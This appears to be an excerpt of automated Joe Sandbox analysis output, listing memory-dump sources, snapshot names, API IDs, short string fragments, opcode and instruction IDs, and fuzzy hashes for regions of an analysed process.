                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_c60000_476D.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: Te^q$dLdq
                                                                                                                                                                                                                                  • API String ID: 0-1027511480
                                                                                                                                                                                                                                  • Opcode ID: 846d00ac7bf5bc4efebfb1540ed608ed983499de6328a8a9a3469803cf2d3fdc
                                                                                                                                                                                                                                  • Instruction ID: 03e083cb6d3578e7b0a31784b4cab4003499a51ed8914f923d1b9f22228d170f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 846d00ac7bf5bc4efebfb1540ed608ed983499de6328a8a9a3469803cf2d3fdc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5251F275B101149FDB44EF69C898A5DBBF6FF89B14B2580AAE406DB3B1CB71EC418B40
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_c60000_476D.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: Hbq$dLdq
                                                                                                                                                                                                                                  • API String ID: 0-411705877
                                                                                                                                                                                                                                  • Opcode ID: d7048bbf7a19a9baba1d058a0442e00531b316e1caf9a07a166f5ec38931d13c
                                                                                                                                                                                                                                  • Instruction ID: febec3c235d738fb0dcfe2e96f8f581ec1784d7c4e5a710f803f892daf4daf0a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d7048bbf7a19a9baba1d058a0442e00531b316e1caf9a07a166f5ec38931d13c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1B41B435B042448FCB15DF69C498B9EBBF6EF89304F1885AAE406DB3A2CA74DD05CB51
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_c60000_476D.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: fcq
                                                                                                                                                                                                                                  • API String ID: 0-2768158334
                                                                                                                                                                                                                                  • Opcode ID: 1f0d8536a111be2d405db4d7e74f11af59eefedfaf3c8cad767335908c9f54f5
                                                                                                                                                                                                                                  • Instruction ID: 8b63e7ab3d2d16e80e3625c9d0fe00ccc7ee5c061fcbdcf562d35f8e28025fdd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f0d8536a111be2d405db4d7e74f11af59eefedfaf3c8cad767335908c9f54f5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 56522034A04309DFDB06ABA4D554BAEBB77FB88304F108814E845377ADCB36A895DF25
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_c60000_476D.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: d
                                                                                                                                                                                                                                  • API String ID: 0-2564639436
                                                                                                                                                                                                                                  • Opcode ID: acb7776deaa3a078bac08413ef12230238334b6d361320ff5144b884c2318a50
                                                                                                                                                                                                                                  • Instruction ID: abb37434147b9e489c32542c0727a37a830fe1fc3772f01966ba1d42189015dc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: acb7776deaa3a078bac08413ef12230238334b6d361320ff5144b884c2318a50
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A321770A00609DFCB24CF69D9C4A6DFBB2FF88304F248629E4669B655D730ED95CB84
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3084765575.00000000057A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057A0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_57a0000_476D.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: 31100409f3725eed70af3b89501ae84f910d0e5ec75dc2b9b2c4e6e1c05a32cc
                                                                                                                                                                                                                                  • Instruction ID: 218ed9800e4aa8d5aaa8d7e1c4a1e6d4a92933d42a07110af3a7a3e8bdb29de4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 31100409f3725eed70af3b89501ae84f910d0e5ec75dc2b9b2c4e6e1c05a32cc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B215E31704215CFC715EB64C9987AE77F2ABCD348F204979D406AB3A6DB758C42DB81
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3084765575.00000000057A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057A0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_57a0000_476D.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: 62aef5a17959334eb522fd50893d539c8dcd5028cf210b4a302892e064f515d4
                                                                                                                                                                                                                                  • Instruction ID: 5e898e25164144836df91ed326c95ad1595d049bcdbdb323ec53a32a2bb2d287
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 62aef5a17959334eb522fd50893d539c8dcd5028cf210b4a302892e064f515d4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E215C31704214CFCB58EB68C9987AE33F6ABCD349F204569D406AB3A6DF719C42DB81
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • KiUserExceptionDispatcher.NTDLL ref: 057A0A89
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3084765575.00000000057A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057A0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_57a0000_476D.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DispatcherExceptionUser
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 6842923-0
                                                                                                                                                                                                                                  • Opcode ID: e7206a7a947bd9db37f67daf1e08b37e7d68c649296ea0d16f8f48bedbb402bd
                                                                                                                                                                                                                                  • Instruction ID: 36c715bc89cd4f5479c1de74eeb9d097418b3a8b91a86c15cd47eeca3d8760d8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e7206a7a947bd9db37f67daf1e08b37e7d68c649296ea0d16f8f48bedbb402bd
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90E03937901424DFCB15EB94E9587ECB331FBC4311F018621D01253518CB306C92CBC1
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • KiUserExceptionDispatcher.NTDLL ref: 057A0A89
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3084765575.00000000057A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057A0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_57a0000_476D.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DispatcherExceptionUser
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 6842923-0
                                                                                                                                                                                                                                  • Opcode ID: a4a15b2e28d94ff6b38c027e315b2895eabbe7f784da954e9f1a24592944671a
                                                                                                                                                                                                                                  • Instruction ID: ac96b40be4f7f20fbffa533a6dc62a4005e58f7e46decc1a8929903443dad483
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a4a15b2e28d94ff6b38c027e315b2895eabbe7f784da954e9f1a24592944671a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 13E09236901924EBCB19DB84E9987ECB371FBC5312F01C625D55693558C730ACA2DF84
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_c60000_476D.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: K
                                                                                                                                                                                                                                  • API String ID: 0-2299363055
                                                                                                                                                                                                                                  • Opcode ID: 8fb03eb39000948cd9fb5482a732ef2ff2e42a11b7a9fe2f082d02c89095ba0d
                                                                                                                                                                                                                                  • Instruction ID: 73eb0efaa377a12e1862a915f7970da44f9a68616f5a79662a5ca84230b39e1a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8fb03eb39000948cd9fb5482a732ef2ff2e42a11b7a9fe2f082d02c89095ba0d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5A51F631A047068FCB25DF68C5905AEBBF2FF85308B248669D456AB395DF30ED4ACB41
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_c60000_476D.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: K
                                                                                                                                                                                                                                  • API String ID: 0-2299363055
                                                                                                                                                                                                                                  • Opcode ID: 22ab9fd8028dfa9edbbf0488d1c991cd3392eaf64d5dc21706ebd7aae4ab1d21
                                                                                                                                                                                                                                  • Instruction ID: 5c416db20669c46e86cbb13e51974b0ee2f54c011dcfd52f18870a5d793d9848
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 22ab9fd8028dfa9edbbf0488d1c991cd3392eaf64d5dc21706ebd7aae4ab1d21
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4D418271E006099FDB25DFA9C59059EBBF2BF84308F208629D416AB355DF70ED4ACB81
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_c60000_476D.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: K
                                                                                                                                                                                                                                  • API String ID: 0-2299363055
                                                                                                                                                                                                                                  • Opcode ID: 6675a6576b11017815fe2958154c51bc0538c13598a790b4a7b4db204bf0307d
                                                                                                                                                                                                                                  • Instruction ID: aea2fb2a42a80114e538f23c78dd5d66122ada410731c1018371939a430477a9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6675a6576b11017815fe2958154c51bc0538c13598a790b4a7b4db204bf0307d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A141A271E046458FCB25DFA9C5905AEBBF2BF84308F248629D415AB395DF30ED4ACB41
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_c60000_476D.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: LR^q
                                                                                                                                                                                                                                  • API String ID: 0-2625958711
                                                                                                                                                                                                                                  • Opcode ID: ef66aebb50f4d114d1190012feb5e4a8474e77851ab5883c578f8478c59909eb
                                                                                                                                                                                                                                  • Instruction ID: d256e8f69b4195d2d2efa726fdeb4047c409457d5851ed9ab8800087539b4230
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef66aebb50f4d114d1190012feb5e4a8474e77851ab5883c578f8478c59909eb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7431E230F002169FDB54EBB98480A6EBBF6FFC9714B184169D55ADB3A4EE308D42C791
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_c60000_476D.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: +/j
                                                                                                                                                                                                                                  • API String ID: 0-589978739
                                                                                                                                                                                                                                  • Opcode ID: 9dd200bd9785af9edaa20ecf3462323f43e03e39651401b6f6b06c9fdb1538cd
                                                                                                                                                                                                                                  • Instruction ID: 4dd56e9c43995f00e5c3696d50fa0be64ceb2c06c3925a713dfe667af5b7ee1c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9dd200bd9785af9edaa20ecf3462323f43e03e39651401b6f6b06c9fdb1538cd
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FC41F0B0D003499FDB20DF99C484ADEBFB5FF48310F208129E81AAB264DB759A45CB90
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_c60000_476D.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: +/j
                                                                                                                                                                                                                                  • API String ID: 0-589978739
                                                                                                                                                                                                                                  • Opcode ID: 53212337ae3ff8d33ab70355ece8cc9f4486e1ed539eeea4fd11ed713e7350a8
                                                                                                                                                                                                                                  • Instruction ID: 4f2170cc86c8297b8dcca185e2b9f876af77d0084005b942ac0ff23380ba952e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 53212337ae3ff8d33ab70355ece8cc9f4486e1ed539eeea4fd11ed713e7350a8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B41E1B0D0034D9FDB10DF99C584ADEBFB5FF48314F208429E81AAB254DB75AA45CB90
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_c60000_476D.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: dLdq
                                                                                                                                                                                                                                  • API String ID: 0-3390252261
                                                                                                                                                                                                                                  • Opcode ID: 0fea252ca975e1e260ebe142a444c6e7fcff2c845337bfcfe9d46304b48a7a4a
                                                                                                                                                                                                                                  • Instruction ID: 54aa498b0a8629477ed139358bc74a79a2d64d7b563629f7f8e66874edf7cf51
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0fea252ca975e1e260ebe142a444c6e7fcff2c845337bfcfe9d46304b48a7a4a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB31AF74A002048FDB15DF69C588BADBBF2FF88300F188569E402AB3A1CB70DD45CB91
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_c60000_476D.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: &?c
                                                                                                                                                                                                                                  • API String ID: 0-1340406174
                                                                                                                                                                                                                                  • Opcode ID: 35b9b20dd2811ed3405fc9f702858174fe6a1a197379419148c61c95649feeef
                                                                                                                                                                                                                                  • Instruction ID: 0533b398b5e70eeb15eab092b89ad965afb7fe100d1746976a0bb68a479c81c4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 35b9b20dd2811ed3405fc9f702858174fe6a1a197379419148c61c95649feeef
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC11A170A003009FEB089F59D98475ABBA5FF84311F108579E5489F3DADBB59C04C7A0
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_c60000_476D.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: &?c
                                                                                                                                                                                                                                  • API String ID: 0-1340406174
                                                                                                                                                                                                                                  • Opcode ID: e7193234854746c6af981173c7bf605d302fad2d133d68af49eb8d2b86e2265d
                                                                                                                                                                                                                                  • Instruction ID: b7db427a08ff2fdf7dd2d062665b3e0a1008240214246c90af5634146b118724
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e7193234854746c6af981173c7bf605d302fad2d133d68af49eb8d2b86e2265d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2901B570A003009FDB089F55D98475ABBA6FFC8301F108439E5089F39ADBB59C04C7A0
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_c60000_476D.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: Hbq
                                                                                                                                                                                                                                  • API String ID: 0-1245868
                                                                                                                                                                                                                                  • Opcode ID: 78d9b5ce295bcfbc0c0cf6c9e415ef18a2597d19602ca8b6ba80891498aa2b9c
                                                                                                                                                                                                                                  • Instruction ID: cb67189a7a8e49ebcbbc3c8e63980d97ba140450cfb87b9d08f1d4f7988c105e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 78d9b5ce295bcfbc0c0cf6c9e415ef18a2597d19602ca8b6ba80891498aa2b9c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2CF0C82570D2901FC746573D586556E2FE6AFD729032944FAD149CB3A3DD288C07D352
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_c60000_476D.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: da665a1c14e9e46e45cda1b5c1733909adb998b9ee67feb3fd855be848a2d813
                                                                                                                                                                                                                                  • Instruction ID: a260e7c24c44f5a080e04b83db9c27a7276f9228f535f86e77bab8deec57a33d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: da665a1c14e9e46e45cda1b5c1733909adb998b9ee67feb3fd855be848a2d813
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B5720E709002188FDB98DBA4CD947DE7BB6FF89300F1081A9D14AA73A5DE345E89EF51
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_c60000_476D.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: fa93b5ef3f693fade1348534b7dcf3cb72a2de6e3e59c960994af1dcb19393e7
                                                                                                                                                                                                                                  • Instruction ID: f8518398a705626464ad87b7d1d58b1a6f917dd784435a8c70bc37446936a5a7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa93b5ef3f693fade1348534b7dcf3cb72a2de6e3e59c960994af1dcb19393e7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FE720F709002188FDB98DBA4CD947DE7BB6FF89300F1081A9D14AA73A5DE345E89EF51
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_c60000_476D.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: b4414ca376f1b6bc942695a22897515b8d123e2cdcbde8f61cb5c6e5b506b03c
                                                                                                                                                                                                                                  • Instruction ID: bdc5cc7518d2217fd0ba1a177153d35697e63d1d40d7b57024f40b8f5b3c6966
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b4414ca376f1b6bc942695a22897515b8d123e2cdcbde8f61cb5c6e5b506b03c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 53810534B092559FCB01EF74D5A45AE7BB2EFC9309B148156C405EB3AADB388C42CF96
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_c60000_476D.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 83e3e2517708bf92a4ef1165bb93c17380b26c881dcea2dfb82a940e11d09b3b
                                                                                                                                                                                                                                  • Instruction ID: ccdc156c276321707a6034528d4a87c3cb6e061805597bf36f9be56e84d89f8e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 83e3e2517708bf92a4ef1165bb93c17380b26c881dcea2dfb82a940e11d09b3b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A861AF70B002159FD714DF78C480A6EBBF6AF88314F24C169D45AAB396DB32EC42CB95
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_c60000_476D.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 06e237808f90b520bdef04989a8a410d8551165d4f188ed5c7a6e99b4b5abcb0
                                                                                                                                                                                                                                  • Instruction ID: 0de61d749e588c48119e1ca43c6562a89600a5a522b00f40ec9a28a42af3c1d3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 06e237808f90b520bdef04989a8a410d8551165d4f188ed5c7a6e99b4b5abcb0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A611C34B0820ACFCB48EBB0E8A866F7772BB847497608916D4169B3D8DF345C42CF81
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_c60000_476D.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 153aae2d7ffddbfff4c50db8f7b4bf5e0b2b90e4c32c9fafffcb072428ed6f4e
                                                                                                                                                                                                                                  • Instruction ID: b43f5e04eeae6b60c896a2f2697f0ed1d50361b05de97e626408e8d0e86b813b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 153aae2d7ffddbfff4c50db8f7b4bf5e0b2b90e4c32c9fafffcb072428ed6f4e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4961ED34B4820ADFCB48EBB0E8A867F7772BB857497608916D4169B398DF345C42CF85
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_c60000_476D.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: d3167bd6139697695151372fa9312cae3c960f7884b11f818a106afd54f28dcd
                                                                                                                                                                                                                                  • Instruction ID: f9d79f1765674547f66c092e7039f4600d46b8a7a21d22da2c3527f07039fbf4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d3167bd6139697695151372fa9312cae3c960f7884b11f818a106afd54f28dcd
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB51E330B04314DFDB16AB78D85875E7AA7AFC9704F148429E405EB3A8CF35DC468B91
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2822289519.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_c60000_476D.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: c07c0aef2933ffd41eee6af19fd127999decb13b7f6b78def51daf9fa34fe6a6
                                                                                                                                                                                                                                  • Instruction ID: 56767d3909d82f2db26d197a2d9eb9f1e336508b21fccbb886c1428b70d690b0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c07c0aef2933ffd41eee6af19fd127999decb13b7f6b78def51daf9fa34fe6a6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B51DF70B002049FCB14EF69D584AAEBBF2FF88311B10C569E91ADB355DB75AD42CB81
                                                                                                                                                                                                                                  Memory Dump Source
